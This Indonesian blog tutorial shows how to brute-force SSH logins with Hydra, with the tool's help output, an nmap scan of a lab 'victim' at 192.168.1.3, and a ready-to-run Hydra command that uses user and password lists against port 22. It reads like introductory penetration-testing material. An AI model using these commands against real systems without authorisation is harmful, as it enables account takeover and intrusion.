Follow Me On


Brute Force SSH Menggunakan Hydra

Secure Shell atau SSH adalah protokol jaringan yang memungkinkan pertukaran data melalui saluran aman antara dua perangkat jaringan, terutama banyak digunakan pada sistem berbasis Linux dan Unix.
Kali ini saya tidak akan membahas bagaimana cara menggunakan SSH melainkan bagai mana  Membobol Password SSH menggunakan Hydra .
hydra adalah tools yang berguna untuk mengaudit sebuah keamanan sebuah pasword pada sistem, tools ini memiliki 2 jenis yaitu GUI (graphical user Interface ) & Console.


===================================================================================

Hydra Support :

AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP, SOCKS5, SSH (v1 and v2), Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP

===================================================================================
Hydra bisa di download pada Link ini

root@drew:~# hydra
Hydra v7.2 (c)2012 by van Hauser/THC & David Maciejak - for legal purposes only

Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE]
[-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT]
[-x MIN:MAX:CHARSET] [-SuvV46] [server service [OPT]]|[service://server[:PORT][/OPT]]

Options:
-R        restore a previous aborted/crashed session
-S        perform an SSL connect
-s PORT   if the service is on a different default port, define it here
-l LOGIN or -L FILE  login with LOGIN name, or load several logins from FILE
-p PASS  or -P FILE  try password PASS, or load several passwords from FILE
-x MIN:MAX:CHARSET  password bruteforce generation, type "-x -h" to get help
-e nsr    try "n" null password, "s" login as pass and/or "r" reversed login
-u        loop around users, not passwords (effective! implied with -x)
-C FILE   colon separated "login:pass" format, instead of -L/-P options
-M FILE   server list for parallel attacks, one entry per line
-o FILE   write found login/password pairs to FILE instead of stdout
-f        exit after the first found login/password pair (per host if -M)
-t TASKS  run TASKS number of connects in parallel (default: 16)
-w / -W TIME  waittime for responses (32s) / between connects per thread
-4 / -6   prefer IPv4 (default) or IPv6 addresses
-v / -V   verbose mode / show login+pass combination for each attempt
-U        service module usage details
server    the target server (use either this OR the -M option)
service   the service to crack. Supported protocols: cisco cisco-enable cvs firebird
ftp[s] http[s]-{head|get} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq
imap irc ldap2 ldap3[-{cram|digest}md5] mssql mysql ncp nntp oracle-listener oracle-sid
pcanywhere pcnfs pop3 postgres rdp rexec rlogin rsh sip smb smtp smtp-enum snmp
socks5 ssh svn teamspeak telnet vmauthd vnc xmpp
OPT       some service modules need special input (use -U to see module help)

Hydra is a tool to guess/crack valid login/password pairs - usage only allowed
for legal purposes! Find the newest version at http://www.thc.org/thc-hydra
Use HYDRA_PROXY_HTTP/HYDRA_PROXY and HYDRA_PROXY_AUTH environment for a proxy.
The following services were not compiled in: sapr3 afp oracle.

Examples:
hydra -l john -p doe 192.168.0.1 ftp
hydra -L user.txt -p secret 192.168.0.1 imap PLAIN
hydra -l admin -P pass.txt http-proxy://192.168.0.1
hydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN

kali ini contoh Victim berada pada IP 192.168.1.3  dan kali ini kita sedikit information gathering menggunakan nmap

root@drew:~# nmap 192.168.1.3

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2013-04-28 13:07 WIT
Nmap scan report for 192.168.1.80
Host is up (0.0000040s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE
22/tcp open  ssh

dari output di atas Service SSH open pada port 22 dan saatnya kita lakukan brute force pada service tersebut.

root@drew:~# hydra -s 22 -S -L /root/userlist.txt -P /root/passlist.txt -t 16 192.168.1.3 ssh

Saya asumsikan user list dan password list berada pada directory root (tinggal sesuaikan saja) .
cara penggunaannya sangat mudah kan ? untuk pembaca yang belum jelas silahkan lihat Video yang saya buat ini

9 comments to Brute Force SSH Menggunakan Hydra ( Video tutoria)

Leave a Reply

  

  

  

You can use these HTML tags

<a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>